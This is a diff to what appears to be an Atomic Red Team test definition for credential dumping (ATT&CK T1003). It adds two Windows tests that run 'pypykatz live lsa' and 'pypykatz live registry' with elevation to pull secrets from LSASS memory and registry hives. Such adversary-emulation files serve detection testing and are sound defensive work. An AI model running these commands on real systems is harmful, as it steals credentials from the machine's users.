diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml
index 0c01166a..fe9d84bc 100644
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -295,4 +295,32 @@ atomic_tests:
     cleanup_command: |
       rm "#{output_folder}\sam"
       rm "#{output_folder}\system"
-      rm "#{output_folder}\security"
\ No newline at end of file
+      rm "#{output_folder}\security"
+
+- name: LSASS read with pypykatz
+  description: |
+    Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
+    #https://github.com/skelsec/pypykatz and it's dependencies must be installed
+  supported_platforms:
+    - windows
+  executor:
+    name: command_prompt
+    elevation_required: true
+    prereq_command: |
+      py -3
+    command: |
+      pypykatz live lsa
+
+- name: Registry parse with pypykatz
+  description: |
+    Parses registry hives to obtain stored credentials
+    #https://github.com/skelsec/pypykatz and it's dependencies must be installed
+  supported_platforms:
+    - windows
+  executor:
+    name: command_prompt
+    elevation_required: true
+    prereq_command: |
+      py -3
+    command: |
+      pypykatz live registry
\ No newline at end of file